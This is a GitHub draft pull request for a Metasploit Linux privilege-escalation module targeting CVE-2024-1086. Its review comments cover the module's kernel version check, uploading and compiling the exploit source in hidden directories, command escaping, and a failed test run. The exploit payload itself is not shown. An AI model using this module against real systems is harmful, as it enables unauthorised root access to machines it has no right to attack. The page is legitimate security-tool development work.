
WIP: LPE CVE-2024-1086 #19625

Draft: wants to merge 1 commit into master

Conversation

h00die
Contributor

@h00die h00die commented Nov 8, 2024

Fixes: #19153

WIP exploit for CVE-2024-1086. Running the exploit by hand on the box seems fairly reliable. However, running it through metasploit currently results in about 75% hard lock of the box, either instantly or within 6 min. 25% of the time it's perfect though!

Only been testing the live build functionality, not the 'drop a pre-compiled binary' branch.

I forgot to bring along a bunch of the library files as well, so need to add those back.

Comment on lines +81 to +91
release = kernel_release
if (
Rex::Version.new(release.split('-').first) >= Rex::Version.new('5.15.0') &&
Rex::Version.new(release.split('-').first) < Rex::Version.new('6.0')
) ||
(
Rex::Version.new(release.split('-').first) < Rex::Version.new('6.6') &&
Rex::Version.new(release.split('-').first) >= Rex::Version.new('6.0')
)
return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
end
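Review bot: the two branches test adjacent ranges (5.15.0 <= v < 6.0 and 6.0 <= v < 6.6), so they collapse into one half-open check, 5.15.0 <= v < 6.6, and `release.split('-').first` is parsed into a Rex::Version six times where once would do. Keep the upper bound strict when simplifying: an inclusive range helper such as Comparable#between? would also flag 6.6 itself. Since distribution kernels backport the fix without changing the base version, returning `Appears` rather than `Vulnerable` is correct here, and the check will still report patched kernels as appearing vulnerable; a short comment saying so would help users reading the AutoCheck line.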
Contributor

Suggested change
release = kernel_release
if (
Rex::Version.new(release.split('-').first) >= Rex::Version.new('5.15.0') &&
Rex::Version.new(release.split('-').first) < Rex::Version.new('6.0')
) ||
(
Rex::Version.new(release.split('-').first) < Rex::Version.new('6.6') &&
Rex::Version.new(release.split('-').first) >= Rex::Version.new('6.0')
)
return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
end
release = kernel_release().split('-').first
if release.between(Rex::Version.new('5.15.0'), Rex::Version.new('6.0'))
return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
elsif release.between(Rex::Version.new('6.0'), Rex::Version.new('6.6'))
return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
end

but it seems that this can be simplified even further to:

    # Parse once; Comparable#between? needs a Rex::Version receiver, not the raw String
    release = Rex::Version.new(kernel_release.split('-').first)
    if release.between?(Rex::Version.new('5.15.0'), Rex::Version.new('6.6'))
      return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
    end

end

def check_musl_tools?
lib = cmd_exec('dpkg --get-selections | grep musl-tools')
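Review bot: `check_musl_tools?` is named as a predicate, but the visible body stores grep's raw output in `lib`; make sure the method returns a boolean (for example `!lib.blank?`) rather than the string. The `dpkg --get-selections | grep musl-tools` pipeline also only answers on dpkg-based systems and matches any package whose name contains that substring, including entries in deinstall state. Testing for the wrapper the package actually provides, `command_exists?('musl-gcc')`, is distribution-independent and uses the same helper the module already relies on for python3 further down.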
Contributor

This will only work on Debian :/

zip.add_file(file.split('CVE-2024-1086/')[1], file_contents)
end
print_status('Finished creating exploit source zip, uploading...')
zip_path = "#{nested_base}/.#{rand_text_alphanumeric(5..10)}.zip"
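Review bot: `file.split('CVE-2024-1086/')[1]` derives each archive entry name from a substring match on the directory name, so it yields nil (and `add_file` fails) for any path that does not contain that string, and picks the wrong suffix if the string occurs twice in the path (for instance when the framework checkout itself sits under a directory of that name). Compute the entry name relative to the data directory you walked to build the file list instead, e.g. `Pathname.new(file).relative_path_from(Pathname.new(src_dir)).to_s` with src_dir being that directory.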
Contributor

Can't the files be concatenated instead?

fail_with Failure::BadConfig, "#{base_dir} is not writable"
end

nested_base = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
Contributor

A couple of IDS are flagging binary execution happening inside hidden folders. I think it'd be better to let the user specify the full path of the folder.

Comment on lines +147 to +153
if command_exists?('python3')
cmd_exec "python3 -m zipfile -e #{zip_path} #{nested_base}"
else
cmd_exec "unzip #{zip_path} -d #{nested_base}"
end
print_status('Compiling')
cmd_exec "cd #{nested_base}; make"
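Review bot: `cd #{nested_base}; make` continues into `make` even when the `cd` fails, so a failed directory change builds whatever happens to be in the session's current directory; use `&&` and check the outcome (the `make` output, and `file?` on the expected binary) before moving on. The unzip branch has the same gap: when neither python3 nor unzip is present, the else branch runs a missing command and the failure only surfaces later, and neither command's exit status is inspected.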
Contributor

The nested_base value contains a portion that is user specified from the WritableDir datastore option. If that value contains a space, then these commands will fail.

We've recently added a new command execution API to handle these cases correctly, and it should generally be used when the command is not static.

As an example, the first one should be create_process('python3', args: ['-m', 'zipfile', '-e', zip_path, nested_base]).

The new #create_process method will take the arguments and ensure that they are escaped correctly for you given the context in which they're executed (platform, session type, etc.).
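The escaping concern in the comment above, as an added example that is not part of the PR or of Metasploit: Ruby's standard-library `Shellwords` stands in for the framework's `create_process`, and the WritableDir value with a space, the nested directory and the zip path are constructed samples.

```ruby
require 'shellwords'

# Constructed sample: a WritableDir containing a space, which the review
# comment above warns about, plus the nested directory and zip path the
# module derives from it (random suffixes replaced by fixed strings).
WRITABLE_DIR = '/tmp/my dir'
NESTED_BASE  = "#{WRITABLE_DIR}/.AbC12"
ZIP_PATH     = "#{NESTED_BASE}/.zXy9.zip"

# Command line built the way the hunk builds it: values interpolated
# straight into the string, so a space in the path splits the argument.
def unzip_cmd_interpolated(zip_path, nested_base)
  "python3 -m zipfile -e #{zip_path} #{nested_base}"
end

# Argument-array form: each element is escaped on its own before joining.
# This is what a create_process-style API does for the caller; Shellwords
# is only a stand-in and assumes a POSIX shell on the target.
def unzip_cmd_escaped(zip_path, nested_base)
  Shellwords.join(['python3', '-m', 'zipfile', '-e', zip_path, nested_base])
end

# The `cd dir; make` step from the same hunk, with the directory escaped and
# `&&` so make does not run in the wrong place when the cd fails.
def make_cmd_escaped(nested_base)
  "cd #{Shellwords.escape(nested_base)} && make"
end

# How a POSIX shell would tokenise a command line into argv.
def argv_for(cmd)
  Shellwords.split(cmd)
end

if __FILE__ == $PROGRAM_NAME
  p argv_for(unzip_cmd_interpolated(ZIP_PATH, NESTED_BASE)) # 8 argv entries
  p argv_for(unzip_cmd_escaped(ZIP_PATH, NESTED_BASE))      # 6 argv entries
end
```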

'Notes' => {
'Stability' => [CRASH_OS_DOWN],
'Reliability' => [UNRELIABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]
Contributor

Is SCREEN_EFFECTS due to the system locking up here? If not would you mind dropping a comment to clarify.

@msutovsky-r7
Contributor

Not really sure if it applies here as this PR is marked as draft, but I have been doing review for #19745 and noticed the following:

msf6 exploit(linux/local/netfilter_nf_tables_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/netfilter_nf_tables_priv_esc) > run
[*] Started reverse TCP handler on 192.168.95.128:4444 
[!] SESSION may not be compatible with this module:
[!]  * Unknown session arch
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Kernel version 5.15.0-126-generic appears to be vulnerable
[*] Creating /tmp/.AwYfaDUz
[-] Exploit failed: ArgumentError wrong number of arguments (given 1, expected 2)
[*] Exploit completed, but no session was created.

Not really sure if it's caused by the escape fix, but it might be worth having it noted here. I'll investigate more later on.

@msutovsky-r7 msutovsky-r7 self-assigned this Dec 20, 2024
Status: Waiting on Contributor

Linked issue this pull request may close: Linux LPE (CVE-2024-1086)

4 participants